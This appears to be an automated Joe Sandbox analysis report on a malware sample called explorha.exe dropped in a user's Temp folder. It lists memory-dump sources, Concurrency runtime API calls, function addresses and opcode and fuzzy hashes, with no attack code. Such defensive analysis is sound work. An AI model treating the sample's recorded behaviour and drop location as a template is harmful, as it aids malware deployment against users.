                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                      • String ID:
                                                                                                      • API String ID: 78362717-0
                                                                                                      • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                      • Instruction ID: ce87156625e010af37c5eab1099154045742f3159d24e26fb8a84ac026d90b46
                                                                                                      • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                      • Instruction Fuzzy Hash: B501F232640224A7CF11FE588851EAF77EEFF94350F081015FC11E7282DA70ED0286A5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00885F15 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ListArray.LIBCONCRT ref: 00885F23
                                                                                                      • ListArray.LIBCONCRT ref: 00885F35
                                                                                                        • Part of subcall function 00886BE5: _InternalDeleteHelper.LIBCONCRT ref: 00886BF4
                                                                                                      • ListArray.LIBCONCRT ref: 00885F3F
                                                                                                      • _InternalDeleteHelper.LIBCONCRT ref: 00885F58
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ArrayList$DeleteHelperInternal
                                                                                                      • String ID:
                                                                                                      • API String ID: 3844194624-0
                                                                                                      • Opcode ID: 48ee500db0464e3b371635463311eb677775c5dad032c7987adcd6594dffdb69
                                                                                                      • Instruction ID: 81e3c262701a4e1c990905f4c9393e16e2783a36452825d595a0b0cfc2736517
                                                                                                      • Opcode Fuzzy Hash: 48ee500db0464e3b371635463311eb677775c5dad032c7987adcd6594dffdb69
                                                                                                      • Instruction Fuzzy Hash: 9401D672600A21AFCB26BB68DCC2E6D7B1AFF947207044069FA04DB516DF21EC21C792
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088ABA0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0088ABA9
                                                                                                        • Part of subcall function 00880B5B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00886B16
                                                                                                      • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0088ABCD
                                                                                                      • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 0088ABE0
                                                                                                      • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 0088ABE9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                      • String ID:
                                                                                                      • API String ID: 218105897-0
                                                                                                      • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                      • Instruction ID: c8b5b486f73127e866e4a0c7356ec0b74a843eea4fda25f8446678af7b88d98f
                                                                                                      • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                      • Instruction Fuzzy Hash: FAF03031600A205EF629BA289811F6A6395FF44729F04845AE59ADB683CA24EC42CB53
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088065D Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::critical_section::unlock.LIBCMT ref: 00880661
                                                                                                        • Part of subcall function 00880FF8: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00881019
                                                                                                        • Part of subcall function 00880FF8: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00881050
                                                                                                        • Part of subcall function 00880FF8: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0088105C
                                                                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0088066D
                                                                                                        • Part of subcall function 00880A9F: Concurrency::critical_section::unlock.LIBCMT ref: 00880AC3
                                                                                                      • Concurrency::Context::Block.LIBCONCRT ref: 00880672
                                                                                                        • Part of subcall function 008819F6: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 008819F8
                                                                                                      • Concurrency::critical_section::lock.LIBCONCRT ref: 00880692
                                                                                                        • Part of subcall function 00880F21: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00880F3C
                                                                                                        • Part of subcall function 00880F21: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00880F47
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$LockNodeNode::Queue$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                                      • String ID:
                                                                                                      • API String ID: 811866635-0
                                                                                                      • Opcode ID: a341d2473880c4bc1834d8fa49453d3c54d3e6db6ee03a0cdf121feb2205bc94
                                                                                                      • Instruction ID: f1889b6720bcfe50faf3507d241fef3c2741136a24c10554e117f3bd9586ff9b
                                                                                                      • Opcode Fuzzy Hash: a341d2473880c4bc1834d8fa49453d3c54d3e6db6ee03a0cdf121feb2205bc94
                                                                                                      • Instruction Fuzzy Hash: 02E04F34600215ABCB58FF68D4655ADFB61FF44310B548349E475872E1CF345E4ACF96
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0089F603 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, xrefs: 0089F608
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
